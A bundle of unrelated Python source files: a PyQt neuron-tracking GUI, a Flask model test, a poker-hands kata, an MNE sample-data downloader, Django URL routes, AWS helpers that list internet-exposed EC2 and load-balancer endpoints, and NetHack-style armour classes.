self.bg_blur.setValidator(QtGui.QIntValidator(0, 100))
save_checkboxes_lay.addWidget(self.bg_blur, subrow, 2)
save_checkboxes_lay.addWidget(QLabel("sigma:"), subrow, 3)
self.sd_blur = QLineEdit("6")
self.sd_blur.setValidator(QtGui.QIntValidator(0, 10))
save_checkboxes_lay.addWidget(self.sd_blur, subrow, 4)
subrow += 1
bg_subtraction_checkbox = QCheckBox("Subtract bg")
bg_subtraction_checkbox.toggled.connect(self.controller.toggle_save_subtracted_bg)
save_checkboxes_lay.addWidget(bg_subtraction_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("background:"), subrow, 1)
self.bg_subt = QLineEdit("1")
self.bg_subt.setValidator(QtGui.QIntValidator(0, 10))
save_checkboxes_lay.addWidget(self.bg_subt, subrow, 2)
subrow += 2
resize_img_checkbox = QCheckBox("Resize image")
resize_img_checkbox.toggled.connect(self.controller.toggle_save_resized_img)
save_checkboxes_lay.addWidget(resize_img_checkbox, subrow, 0)
save_checkboxes_lay.addWidget(QLabel("Width:"), subrow, 1)
self.resized_width = QLineEdit("16")
self.resized_width.setValidator(QtGui.QIntValidator(0, 512))
save_checkboxes_lay.addWidget(self.resized_width, subrow, 2)
save_checkboxes_lay.addWidget(QLabel("height:"), subrow, 3)
self.resized_height = QLineEdit("32")
self.resized_height.setValidator(QtGui.QIntValidator(0, 512))
save_checkboxes_lay.addWidget(self.resized_height, subrow, 4)
preproc_tab_grid.addLayout(save_checkboxes_lay, row, 0)
row += 1
subrow = 0
approve_lay = QGridLayout()
approve_lay.addWidget(QLabel("Choose frames from:"), subrow, 0)
self.frame_from = QLineEdit("0")
self.frame_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.frame_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.frame_to = QLineEdit(str(frame_num))
self.frame_to.setValidator(QtGui.QIntValidator(0, frame_num))
approve_lay.addWidget(self.frame_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Delete frames:"), subrow, 0)
self.delete_fr = QLineEdit(str(frame_num)+","+str(frame_num+1))
self.delete_fr.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
approve_lay.addWidget(self.delete_fr, subrow, 1)
approve_lay.addWidget(QLabel("and intervals:"), subrow, 2)
self.delete_inter = QLineEdit(str(frame_num)+"-"+str(frame_num+1))
self.delete_inter.setStyleSheet("height: 15px; width: 5px;min-width: 5px;")
approve_lay.addWidget(self.delete_inter, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose z from:"), subrow, 0)
self.z_from = QLineEdit("0")
self.z_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.z_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.z_to = QLineEdit("32")
self.z_to.setValidator(QtGui.QIntValidator(0, 35))
approve_lay.addWidget(self.z_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose x from:"), subrow, 0)
self.x_from = QLineEdit("0")
approve_lay.addWidget(self.x_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.x_to = QLineEdit("0")
#self.x_to.setValidator(QtGui.QIntValidator(0, 1025))
approve_lay.addWidget(self.x_to, subrow, 3)
subrow += 1
approve_lay.addWidget(QLabel("Choose y from:"), subrow, 0)
self.y_from = QLineEdit("0")
#self.y_from.setValidator(QtGui.QIntValidator(0, frame_num - 1))
approve_lay.addWidget(self.y_from, subrow, 1)
approve_lay.addWidget(QLabel("to:"), subrow, 2)
self.y_to = QLineEdit("0")
#self.y_to.setValidator(QtGui.QIntValidator(0, 1025))
approve_lay.addWidget(self.y_to, subrow, 3)
subrow += 1
save_separate_btn = QPushButton("Save in a separate file")
save_separate_btn.clicked.connect(self._Preprocess_and_save)
approve_lay.addWidget(save_separate_btn)
preproc_tab_grid.addLayout(approve_lay, row, 0)
row += 1
wid = QWidget()
wid.setLayout(preproc_tab_grid)
self.setWidget(wid)
self.setWidgetResizable(True)
self.setContentsMargins(5, 5, 5, 5)
def _Preprocess_and_save(self):
Z_int = np.zeros(2)
Z_int[0]=int(self.z_from.text())
Z_int[1]=int(self.z_to.text())
X_int = np.zeros(2)
X_int[0]=int(self.x_from.text())
X_int[1]=int(self.x_to.text())
Y_int = np.zeros(2)
Y_int[0]=int(self.y_from.text())
Y_int[1]=int(self.y_to.text())
frame_range = range(int(self.frame_from.text()),int(self.frame_to.text()))
del_single_fr = self.delete_fr.text().split(',')
del_single_fr_array = [int(fr) for fr in del_single_fr]
del_interval_fr = self.delete_inter.text().split(',')
Tot_del_fr = set()
for i in range(len(del_interval_fr)):
interval_str = del_interval_fr[i].split('-')
interval_array = range(int(interval_str[0]),int(interval_str[1])+1)
print(interval_array)
Tot_del_fr = Tot_del_fr.union(set(interval_array))
Tot_del_fr = Tot_del_fr.union(set(del_single_fr_array))
Tot_del_fr_final = [int(fr) for fr in Tot_del_fr]
bg_blur=int(self.bg_blur.text())
sd_blur=int(self.sd_blur.text())
bg_subt=int(self.bg_subt.text())
resized_width = int(self.resized_width.text())
resized_height = int(self.resized_height.text())
self.controller.Preprocess_and_save(frame_range,Tot_del_fr,Z_int,X_int,Y_int,bg_blur,sd_blur,bg_subt,resized_width,resized_height)
def import_file(self):
FileAddress = self.import_address.text()
self.controller.import_mask_from_external_file(FileAddress)
def import_file_green(self):
FileAddress = self.import_address.text()
self.controller.import_mask_from_external_file(FileAddress,green=True)
class LabeledSlider(QWidget):
def __init__(self, minimum, maximum, interval=1, orientation=Qt.Horizontal,
labels=None, parent=None):
super(LabeledSlider, self).__init__(parent=parent)
levels=list(range(minimum, maximum+interval, interval))
if levels[-1]>maximum:
levels=levels[:-1]
#levels[-1]=maximum
if labels is not None:
if not isinstance(labels, (tuple, list)):
raise Exception("<labels> is a list or tuple.")
if len(labels) != len(levels):
raise Exception("Size of <labels> doesn't match levels.")
self.levels=list(zip(levels,labels))
else:
self.levels=list(zip(levels,map(str,levels)))
if orientation==Qt.Horizontal:
self.layout=QVBoxLayout(self)
elif orientation==Qt.Vertical:
self.layout=QHBoxLayout(self)
else:
raise Exception("<orientation> wrong.")
# gives some space to print labels
self.left_margin=10
self.top_margin=10
self.right_margin=10
self.bottom_margin=10
self.layout.setContentsMargins(self.left_margin,self.top_margin,
self.right_margin,self.bottom_margin)
self.sl=QSlider(orientation, self)
self.sl.setMinimum(minimum)
self.sl.setMaximum(maximum)
self.sl.setValue(minimum)
if orientation==Qt.Horizontal:
self.sl.setTickPosition(QSlider.TicksBelow)
self.sl.setMinimumWidth(300) # just to make it easier to read
else:
self.sl.setTickPosition(QSlider.TicksLeft)
self.sl.setMinimumHeight(300) # just to make it easier to read
self.sl.setTickInterval(interval)
self.sl.setSingleStep(1)
self.layout.addWidget(self.sl)
def paintEvent(self, e):
super(LabeledSlider,self).paintEvent(e)
style=self.sl.style()
painter=QPainter(self)
st_slider=QStyleOptionSlider()
st_slider.initFrom(self.sl)
st_slider.orientation=self.sl.orientation()
length=style.pixelMetric(QStyle.PM_SliderLength, st_slider, self.sl)
available=style.pixelMetric(QStyle.PM_SliderSpaceAvailable, st_slider, self.sl)
for v, v_str in self.levels:
# get the size of the label
rect=painter.drawText(QRect(), Qt.TextDontPrint, v_str)
if self.sl.orientation()==Qt.Horizontal:
# I assume the offset is half the length of slider, therefore
# + length//2
x_loc=QStyle.sliderPositionFromValue(self.sl.minimum(),
self.sl.maximum(), v, available)+length//2
# left bound of the text = center - half of text width + L_margin
left=x_loc-rect.width()//2+self.left_margin
bottom=self.rect().bottom()
# enlarge margins if clipping
if v==self.sl.minimum():
if left<=0:
self.left_margin=rect.width()//2-x_loc
if self.bottom_margin<=rect.height():
self.bottom_margin=rect.height()
self.layout.setContentsMargins(self.left_margin,
self.top_margin, self.right_margin,
self.bottom_margin)
if v==self.sl.maximum() and rect.width()//2>=self.right_margin:
self.right_margin=rect.width()//2
self.layout.setContentsMargins(self.left_margin,
self.top_margin, self.right_margin,
self.bottom_margin)
else:
y_loc=QStyle.sliderPositionFromValue(self.sl.minimum(),
self.sl.maximum(), v, available, upsideDown=True)
bottom=y_loc+length//2+rect.height()//2+self.top_margin-3
# there is a 3 px offset that I can't attribute to any metric
left=self.left_margin-rect.width()
if left<=0:
self.left_margin=rect.width()+2
self.layout.setContentsMargins(self.left_margin,
self.top_margin, self.right_margin,
self.bottom_margin)
pos=QPoint(left, bottom)
painter.drawText(pos, v_str)
return
class TimeSlider(LabeledSlider):
def __init__(self,controller,T,n_labels):
self.controller=controller
self.controller.frame_registered_clients.append(self)
if n_labels>T:
n_labels=T
super(TimeSlider,self).__init__(minimum=0, maximum=T-1, interval=int(T/n_labels))
self.sl.valueChanged.connect(lambda :self.controller.go_to_frame(self.sl.value()))
def change_t(self,t):
"""Callback when the controller changes the time, this adjusts the slider display."""
# blocking the signal is very important because otherwise setValue will emit valueChanged, which will trigger
# controller.go_to_frame (which calls change_t) and cause an infinite loop
#t=30#self.gui.time
if True:#self.sl.value()!=t:
self.sl.blockSignals(True)
self.sl.setValue(t)
self.sl.blockSignals(False)
class GoTo(QWidget):
"""
This is the field and button to manually enter the frame number and move to it.
"""
def __init__(self, controller, nb_frames:int):
"""
:param controller: main controller to report to
:param nb_frames: number of frames in video
"""
super().__init__()
self.controller = controller
self.grid=QGridLayout()
self.grid.addWidget(QLabel("Go To Frame: "), 0, 0)
self.text_field = QLineEdit("0")
self.text_field.setValidator(QtGui.QIntValidator(0, nb_frames - 1))
self.grid.addWidget(self.text_field, 0, 1)
gobut = QPushButton("Go")
gobut.setStyleSheet("background-color : rgb(93,177,130); border-radius: 4px; min-height: 20px; min-width: 50px")
gobut.clicked.connect(self.signal_goto)
self.grid.addWidget(gobut, 0, 2)
self.setLayout(self.grid)
def signal_goto(self):
self.controller.go_to_frame(int(self.text_field.text()))
class DashboardTab(QWidget):
def __init__(self, controller, dashboard_chunk_size):
super().__init__()
self.controller = controller
self.T = self.controller.frame_num
self.controller.frame_registered_clients.append(self)
self.controller.neuron_keys_registered_clients.append(self)
self.controller.present_neurons_registered_clients.append(self)
self.controller.present_neurons_all_times_registered_clients.append(self)
self.scrollarea = QScrollArea()
self.scrollwidget = QWidget()
self.chunksize = dashboard_chunk_size
self.n_cols = 0
self.chunknumber = 0
self.current_i = 0 # the line number of the current time t, i.e. t%self.chunksize
self.grid = QGridLayout()
self.time_label_buttons = []
self.button_columns = {}
for i in range(self.chunksize): # TODO AD align left rather than centering (when no neuron is assigned)
label_button = QPushButton(str(i) if i < self.T else "")
label_button.clicked.connect(self._make_button_press_function_t(i))
label_button.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
label_button.setFixedWidth(30)
self.time_label_buttons.append(label_button)
self.grid.addWidget(label_button, i, 0)
current_btn = self.current_label_button
current_btn.setStyleSheet("background-color : rgb(42,99,246); border-radius: 4px;")
self.scrollwidget.setLayout(self.grid)
self.scrollarea.setWidget(self.scrollwidget)
self.scrollarea.setMinimumWidth(
self.scrollarea.sizeHint().width() + self.scrollarea.verticalScrollBar().sizeHint().width())
self.scrollarea.horizontalScrollBar().setEnabled(False)
self.scrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.scrollarea.setWidgetResizable(True)
self.scrollarea.setContentsMargins(5, 5, 5, 5)
maingrid = QVBoxLayout()
topscrollarea = QScrollArea()
topscrollarea.setFixedHeight(40)
topscrollarea.setWidgetResizable(True)
topscrollarea.setContentsMargins(5, 5, 5, 5)
topscrollwidget = QWidget()
self.topgrid = QGridLayout()
button = QPushButton("")
button.setFixedWidth(30)
button.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
self.topgrid.addWidget(button, 0, 0)
self.keys = {}
topscrollwidget.setLayout(self.topgrid)
topscrollarea.setWidget(topscrollwidget)
topscrollarea.setMinimumWidth(
topscrollarea.sizeHint().width() + topscrollarea.verticalScrollBar().sizeHint().width())
topscrollarea.horizontalScrollBar().setEnabled(False)
topscrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
maingrid.addWidget(topscrollarea)
maingrid.addWidget(self.scrollarea)
self.setLayout(maingrid)
@property
def current_label_button(self):
return self.time_label_buttons[self.current_i]
def _make_button_press_function_t(self, i):
def button_press_function():
self.controller.go_to_frame(np.clip(self.chunksize * self.chunknumber + i, 0, self.T-1))
return button_press_function
def _make_button_press_function_h(self, idx_from1):
def button_press_function():
self.controller.highlight_neuron(idx_from1)
return button_press_function
def _make_button_press_function_th(self, i, idx_from1):
def button_press_function():
self.controller.go_to_frame(np.clip(self.chunksize * self.chunknumber + i, 0, self.T-1))
self.controller.highlight_neuron(idx_from1)
return button_press_function
def change_t(self, t):
# unselect previous current button
current_btn = self.current_label_button
current_btn.setStyleSheet("background-color : rgb(255,255,255); border-radius: 4px;")
current_btn.setStyle(current_btn.style()) # for some reason this is needed to actually change the color
# change time
chunknumber = t // self.chunksize
if self.chunknumber != chunknumber:
for i in range(self.chunksize):
t_i = self.chunksize * chunknumber + i
self.time_label_buttons[i].setText(str(t_i) if t_i < self.T else "")
self.chunknumber = chunknumber
self.current_i = t % self.chunksize
# select new current button
current_btn = self.current_label_button
self.scrollarea.ensureWidgetVisible(current_btn)
current_btn.setStyleSheet("background-color : rgb(42,99,246); border-radius: 4px;")
current_btn.setStyle(current_btn.style()) # for some reason this is needed to actually change the color
def change_neuron_keys(self, key_changes):
"""
:param key_changes: list of (neuron_idx_from1, key), with key=None for unassigning
"""
for idx_from1, key in key_changes:
if key is None and idx_from1 in self.button_columns: # remove the button column
for btn in self.button_columns[idx_from1]:
# btn.widget().setParent(None)
btn.setParent(None)
self.n_cols -= 1
else: # add a column of buttons
j = self.n_cols
col = []
button = QPushButton(key)
button.clicked.connect(self._make_button_press_function_h(idx_from1))
# button.setFixedWidth(25)
color = self.controller.neuron_color(idx_from1)
button.setStyleSheet("background-color : rgb(" + str(color[0]) + "," + str(
color[1]) + "," + str(color[2]) + "); border-radius: 4px;")
col.append(button)
self.topgrid.addWidget(button, 0, j + 1)
# find at which times the neuron is present
times_present = set(self.controller.times_of_presence(idx_from1))
for i in range(self.chunksize):
callback = self._make_button_press_function_th(i, idx_from1)
button = DashboardItem(idx_from1, callback)
t = self.chunknumber * self.chunksize + i
if t in times_present:
button.set_present()
else:
button.set_absent()
col.append(button)
self.grid.addWidget(button, i, j + 1)
self.button_columns[idx_from1] = col
self.n_cols += 1
def change_present_neurons(self, present=None, added=None, removed=None):
"""
Changes which of the neurons are present in current frame, as their corresponding buttons should be colored
in blue instead of red.
:param present: which neuron indices (from 1) are present, if given
:param added: single neuron index (from 1) that was added, if given
:param removed: single neuron index (from 1) that was removed, if given
"""
if present is not None:
for i_from1, col in self.button_columns.items():
if i_from1 in present:
col[self.current_i+1].set_present()
else:
col[self.current_i+1].set_absent()
return
if added is not None and added in self.button_columns:
self.button_columns[added][self.current_i+1].set_present()
if removed is not None and removed in self.button_columns:
self.button_columns[removed][self.current_i+1].set_absent()
def change_present_neurons_all_times(self, neuron_presence):
for idx_from1, column in self.button_columns.items():
for i in range(self.chunksize):
t = self.chunknumber * self.chunksize + i
if t >= self.T:
break
if neuron_presence[t, idx_from1]:
column[i+1].set_present()
else:
column[i+1].set_absent()
class TrackTab(QWidget):
def __init__(self,controller):
super().__init__()
self.controller = controller
self.methods=tracking_methods.methodnames
self.methodhelps=tracking_methods.methodhelps
self.grid=QGridLayout()
row=0
self.grid.addWidget(QLabel("Select Method:"),row,0)
row+=1
self.combobox=QComboBox()
self.combobox.addItem("")
for key in self.methods:
self.combobox.addItem(key)
self.combobox.setCurrentIndex(0)
self.combobox.currentIndexChanged.connect(self.make_method_change_func())
self.grid.addWidget(self.combobox,row,0)
row+=1
self.grid.addWidget(QLabel("Parameters:"),row,0)
row+=1
scroll=QScrollArea()
scroll.setWidgetResizable(True)
content = QWidget()
lay = QVBoxLayout()
self.help=QLabel()
self.help.setWordWrap(True)
self.help.setAlignment(Qt.AlignLeft | Qt.AlignTop)
lay.addWidget(self.help)
content.setLayout(lay)
scroll.setWidget(content)
self.grid.addWidget(scroll,row,0)
row+=1
self.param_edit=QLineEdit()
self.grid.addWidget(self.param_edit,row,0)
row+=1
self.run_button=QPushButton("Run")
self.run_button.setStyleSheet("background-color : rgb(93,177,130); border-radius: 4px; min-height: 20px")
self.run_button.setEnabled(False)
self.run_button.clicked.connect(self.make_run_function())
self.grid.addWidget(self.run_button,row,0)
row+=1
self.setLayout(self.grid)
def make_method_change_func(self):
def method_change_func(index):
if index==0:
self.run_button.setEnabled(False)
self.help.setText("")
else:
self.run_button.setEnabled(True)
self.help.setText(self.methodhelps[str(self.combobox.currentText())])
return method_change_func
def make_run_function(self):
def run_function():
name=str(self.combobox.currentText())
params=self.param_edit.text()
self.run(name,params)
return run_function
def run(self,method_name,params):
msgbox=QMessageBox()
msgbox.setText("Confirm Run")
msgbox.setInformativeText("Run "+method_name+" with "+params+"?")
msgbox.setStandardButtons(QMessageBox.Yes|QMessageBox.No)
res=msgbox.exec()
if res==QMessageBox.No:
return
self.controller.save_status()
dataset_path = self.controller.pause_for_NN()
progress=QProgressDialog("","cancel",-1,101)
labeltext="Running "+method_name+((" with "+params) if params!="" else "") +":\n"
progress.setLabelText(labeltext)
progress.showNormal()
progress.resize(500,100)
progress.setWindowModality(Qt.WindowModal)
progress.setValue(-1)
QApplication.processEvents()
command_pipe_main,command_pipe_sub=Pipe()
process = Process(target=tracking_methods.run, args=(method_name,command_pipe_sub,dataset_path,params))
process.start()
command_pipe_main.send("run")
while True:
if progress.wasCanceled():
command_pipe_main.send("cancel")
break
command_pipe_main.send("report")
res=command_pipe_main.recv()
if res=="Done":
command_pipe_main.send("close")
break
else:
if type(res)==list:
stepname,progress_value=res
progress.setLabelText(labeltext+stepname)
progress.setValue(progress_value)
QApplication.processEvents()
process.join()
progress.setValue(101)
self.controller.unpause_for_NN(dataset_path)
|
import unittest
from app.models import Category
from app import db
class CategoryModelTest(unittest.TestCase):
"""Class that tests the Category Model."""
def setUp(self):
"""Set Up Test that creates a new category instance"""
self.new_category = Category(name="interview pitch")
def tearDown(self):
"""Deletes all user and pitch elements from the database after every test."""
Category.query.delete()
db.session.commit()
def test_category_variables(self):
"""Checks if the category variables are correctly placed."""
self.assertEquals(self.new_category.name,"interview pitch")
def test_save_category(self):
"""Checks if a category is being saved."""
self.new_category.save_category()
self.assertTrue(len(Category.query.all())>0)
def test_get_categories(self):
"""Checks if all categories are returned."""
category_two=Category(name="product pitch")
category_three=Category(name="story pitch")
category_four=Category(name="Shoot your Shot")
category_five=Category(name="app pitch")
category_six=Category(name="election pitch")
self.new_category.save_category()
category_two.save_category()
category_three.save_category()
category_four.save_category()
category_five.save_category()
category_six.save_category()
got_categories = Category.get_categories()
self.assertTrue(len(got_categories) == 6)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .common import CHROMATICITY_DIAGRAM_TRANSFORMATIONS, Cycle
__all__ = ['CHROMATICITY_DIAGRAM_TRANSFORMATIONS', 'Cycle']
|
# http://www.codingdojo.org/cgi-bin/index.pl?KataPokerHands
from enum import Enum
RESULTS = Enum('RESULTS', 'WIN DRAW LOSE')
def poker_hands(a, b):
def get_score(x):
return ask_rank_score(ask_rank(x))
rank_a, rank_b = ask_rank(a), ask_rank(b)
win_card, win_rank = None, None
score_a, score_b = get_score(a), get_score(b)
if score_a == score_b:
value_a, value_b = get_value_card(a), get_value_card(b)
for i, j in zip(value_a, value_b):
if i != j:
result = RESULTS.WIN if i > j else RESULTS.LOSE
win_card = i if i > j else j
break
else:
result = RESULTS.DRAW
else:
result = RESULTS.WIN if score_a > score_b else RESULTS.LOSE
if result != RESULTS.DRAW:
win_rank = rank_a if RESULTS.WIN else rank_b
if win_card:
card = \
[str(i) for i in range(11)] + ['Jack', 'Queen', 'King', 'Ace']
win_card = card[win_card]
return (result, win_rank, win_card)
def get_value_card(a):
a = [get_card_score(i) for i in a]
count = sorted([(a.count(i), i) for i in set(a)], reverse=True)
values = [i[1] for i in count]
return values
# Score
def ask_rank(cards):
rule_ranks = [
(is_straight_flush_rank, 'straight flush'),
(check_four_of_kind, 'four of kind'),
(check_full_house, 'full house'),
(check_flush, 'flush'),
(is_straight_rank, 'straight'),
(check_three_of_kind, 'three of kind'),
(check_two_pairs, 'two pairs'),
(check_one_pair, 'pair'),
]
result = 'high card'
for rule, rank in rule_ranks:
if rule(cards):
result = rank
break
return result
def ask_rank_score(rank):
rank_score = {
'high card': 0,
'pair': 1,
'two pairs': 2,
'three of kind': 3,
'straight': 4,
'flush': 5,
'full house': 6,
'four of kind': 7,
'straight flush': 8
}
return rank_score.get(rank, 0)
# Integration method
def is_straight_rank(cards):
return check_straight(cards) and not check_flush(cards)
def is_flush_rank(cards):
return not check_straight(cards) and check_flush(cards)
def is_straight_flush_rank(cards):
return check_straight(cards) and check_flush(cards)
# Unit method
def get_card_score(card):
first_letter = card[0]
score_table = [str(i) for i in range(2, 10)] + ['T', 'J', 'Q', 'K', 'A']
return score_table.index(first_letter) + 2
def get_set_number_of_cards(cards):
cards_number = [i[0] for i in cards]
set_cards = set(cards_number)
return [cards_number.count(i) for i in set_cards]
def check_one_pair(cards):
return len(get_set_number_of_cards(cards)) == 4
def check_two_pairs(cards):
count = sorted(get_set_number_of_cards(cards))
return len(count) == 3 and count == [1, 2, 2]
def check_three_of_kind(cards):
count = sorted(get_set_number_of_cards(cards))
return len(count) == 3 and count == [1, 1, 3]
def check_straight(cards):
sorted_cards = sorted([get_card_score(i) for i in cards])
is_consecutive = sorted_cards[4] - sorted_cards[0] == 4
is_distinct = len(set(sorted_cards)) == 5
return is_consecutive and is_distinct
def check_flush(cards):
set_suit_cards = {i[1] for i in cards}
return len(set_suit_cards) == 1
def check_full_house(cards):
count = sorted(get_set_number_of_cards(cards))
return len(count) == 2 and count == [2, 3]
def check_four_of_kind(cards):
count = sorted(get_set_number_of_cards(cards))
return len(count) == 2 and count == [1, 4]
|
###
# Sample data loading code. Adapted from MNE Python.
#
# All credit to:
##
####
# Authors: Alexandre Gramfort <gramfort@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Denis Egnemann <d.engemann@fz-juelich.de>
# License: BSD Style.
import os
import os.path as op
import shutil
import tarfile
import logging
logger = logging.getLogger('forwardlog')
from mne.utils import _fetch_file
def _data_path(path=None, force_update=False, update_path=True,
download=True, name=None, verbose=None):
if path is None:
path = op.join(os.environ["COMA_DIR"],"examples")
if not isinstance(path, basestring):
raise ValueError('path must be a string or None')
if name == 'example':
archive_name = "ComaSample.tar.gz"
url = "https://www.dropbox.com/s/thpu5cph0hv94bz/" + archive_name + "?dl=1"
folder_name = "ComaSample"
folder_path = op.join(path, folder_name)
rm_archive = False
else:
raise ValueError('Sorry, the dataset "%s" is not known.' % name)
if not op.exists(folder_path) and not download:
return ''
if not op.exists(folder_path) or force_update:
logger.info('Sample data archive %s not found at:\n%s\n'
'It will be downloaded and extracted at this location.'
% (archive_name, folder_path))
archive_name = op.join(path, archive_name)
rm_archive = True
if op.exists(archive_name):
msg = ('Archive already exists at %r. Overwrite it '
'(y/[n])? ' % archive_name)
answer = raw_input(msg)
if answer.lower() == 'y':
os.remove(archive_name)
else:
raise IOError('Archive file already exists at target '
'location %r.' % archive_name)
_fetch_file(url, archive_name, print_destination=False)
if op.exists(folder_path):
shutil.rmtree(folder_path)
logger.info('Decompressing the archive: ' + archive_name)
logger.info('... please be patient, this can take some time')
for ext in ['gz', 'bz2']: # informed guess (and the only 2 options).
try:
tarfile.open(archive_name, 'r:%s' % ext).extractall(path=path)
except tarfile.ReadError, err:
logger.info('%s is %s trying "bz2"' % (archive_name, err))
if rm_archive:
os.remove(archive_name)
path = op.abspath(path)
path = op.join(path, folder_name)
return path
|
# -*- coding: utf-8 -*-
from django.conf.urls import patterns, url
urlpatterns = patterns(
'dnd.races.views',
# races
url(
r'^$',
'race_index',
name='race_index',
),
# races > by rulebooks
url(
r'^by-rulebooks/$',
'race_list_by_rulebook',
name='race_list_by_rulebook',
),
# races > rulebook
url(
r'^(?P<rulebook_slug>[^/]+)--(?P<rulebook_id>\d+)/$',
'races_in_rulebook',
name='races_in_rulebook',
),
# races > rulebook > feat
url(
r'^(?P<rulebook_slug>[^/]+)--(?P<rulebook_id>\d+)/(?P<race_slug>[^/]+)--(?P<race_id>\d+)/$',
'race_detail',
name='race_detail',
),
# racial types
url(
r'^types/$',
'race_type_index',
name='race_type_index'
),
# race > detail
url(
r'^types/(?P<race_type_slug>[^/]+)/$',
'race_type_detail',
name='race_type_detail'
),
)
|
from itertools import chain
from typing import List
from collections import namedtuple, defaultdict
import logging
logger = logging.getLogger()
EC2Url = namedtuple('EC2Url', ['url', 'instance_id'])
def get_ec2_urls(ec2_client) -> List[EC2Url]:
"""
Returns a collection of EC2 instances URL addresses
which exposed to the internet.
param ec2_client: botocore.client.EC2
"""
urls = set()
resevs = list(chain(*(page['Reservations']
for page in ec2_client.get_paginator('describe_instances').paginate(
Filters=[
{
'Name': 'instance-state-name',
'Values': ['running']
}
]))))
group_ids_to_instances = defaultdict(list)
for instances in resevs:
for instance_data in instances['Instances']:
i_id = instance_data['InstanceId']
for network_inr in instance_data['NetworkInterfaces']:
association = network_inr.get('Association')
if not association:
continue
public_ip = association.get('PublicIp')
if public_ip is None:
continue # only collect public ip addresses
for group in network_inr.get('Groups', []):
group_ids_to_instances[group['GroupId']].append((public_ip, i_id))
if not group_ids_to_instances:
return list(urls)
group_ids_to_instances = dict(group_ids_to_instances)
sec_groups = list(
chain(*(page['SecurityGroups']
for page in ec2_client.get_paginator('describe_security_groups').paginate(
GroupIds=list(group_ids_to_instances.keys())
))))
for sec in sec_groups:
for ip_prem in sec['IpPermissions']:
if ip_prem['FromPort'] == '-1':
continue # we can skip DHCP related rules
for ip_range in ip_prem['IpRanges']:
if ip_range['CidrIp'].startswith("0.0.0.0/"):
for ec2_info in group_ids_to_instances[sec['GroupId']]:
urls.add(EC2Url(f'http://{ec2_info[0]}:{ip_prem["FromPort"]}/',
ec2_info[1]))
urls.add(EC2Url(f'https://{ec2_info[0]}:{ip_prem["FromPort"]}/',
ec2_info[1]))
return list(urls)
LoadBalancerUrl = namedtuple('LoadBalancerUrl', ['url', 'identifier', 'header', 'explicit_method', 'params'])
def _get_string_from_reg(s: str) -> str:
example_string = s.replace('?', 'a')
return example_string.replace('*', 'test')
def get_load_balancers(elb_client) -> List[LoadBalancerUrl]:
"""
Returns a collection of load balancers URL addresses
which exposed to the internet.
param elb_client: botocore.client.ELB2
"""
results = list()
response = elb_client.describe_load_balancers()
lb_info = response['LoadBalancers']
for lb in lb_info:
if lb['Scheme'] != 'internet-facing':
continue
dns_name = lb['DNSName']
load_balancer_identifier = lb['LoadBalancerName']
resp_listener = elb_client.describe_listeners(LoadBalancerArn=lb['LoadBalancerArn'])
for listener in resp_listener['Listeners']:
port = listener['Port']
if listener['Protocol'] == 'HTTP':
protocols = ['http']
elif listener['Protocol'] == 'HTTPS':
protocols = ['https']
else:
protocols = ['http', 'https']
rules = elb_client.describe_rules(ListenerArn=listener['ListenerArn'])['Rules']
if not rules:
for p in protocols:
results.append(LoadBalancerUrl(
url=f'{p}://{dns_name}:{port}/',
identifier=load_balancer_identifier,
header={},
explicit_method=None,
params={}
))
for rule in rules:
for action in rule.get('Actions', []):
if action['Type'] in ('fixed-response', 'authenticate-oidc', 'authenticate-cognito'):
continue # We don't want to check the URI, if the target of the LB of those types.
subdomain = ""
params = {}
explicit_request_method = None
uri_to_append = '/'
headers_needed = {}
for condition in rule.get('Conditions', []):
if condition['Field'] == 'http-header':
header_config = condition['HttpHeaderConfig']
headers_needed[header_config['HttpHeaderName']] = _get_string_from_reg(header_config['Values'][0])
elif condition['Field'] == 'path-pattern':
path_config = condition['PathPatternConfig']
uri_to_append = _get_string_from_reg(path_config['Values'][0])
if uri_to_append[0] != '/':
uri_to_append = '/' + uri_to_append
elif condition['Field'] == 'host-header':
host_config = condition['HostHeaderConfig']
subdomain = f'{_get_string_from_reg(host_config["Values"][0])}.'
elif condition['Field'] == 'query-string':
query_config = condition['QueryStringConfig']
for val in query_config["Values"]:
if 'Key' in val:
params[val['Key']] = _get_string_from_reg(val['Value'])
else:
params['test'] = _get_string_from_reg(val['Value'])
elif condition['Field'] == 'http-request-method':
request_config = condition['HttpRequestMethodConfig']
explicit_request_method = request_config["Values"][0]
else:
continue
for p in protocols:
results.append(LoadBalancerUrl(
url=f'{p}://{subdomain}{dns_name}:{port}{uri_to_append}',
identifier=load_balancer_identifier,
header=headers_needed,
explicit_method=explicit_request_method,
params=params
))
return results
|
from django.shortcuts import render
def home(request):
return render(request, 'pages/home.html')
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from .base_armour import Armour
from ... import material as M
class BaseCloak(Armour):
pass
class MummyWrapping(BaseCloak):
def __init__(self):
super().__init__('mummy wrapping', weight=3, armour_class=0, material=M.Cloth)
class OrcishCloak(BaseCloak):
def __init__(self):
super().__init__('orcish cloak', weight=10, armour_class=0, material=M.Cloth)
class DwarvishCloak(BaseCloak):
def __init__(self):
super().__init__('dwarvish cloak', weight=10, armour_class=0, material=M.Cloth)
class LeatherCloak(BaseCloak):
def __init__(self):
super().__init__('leather cloak', weight=15, armour_class=1, material=M.Leather)
class OilskinCloak(BaseCloak):
def __init__(self):
super().__init__('oilskin cloak', weight=10, armour_class=1, material=M.Cloth)
|
from .core import *
from .interaction import *
from .normalization import *
from .activation import *
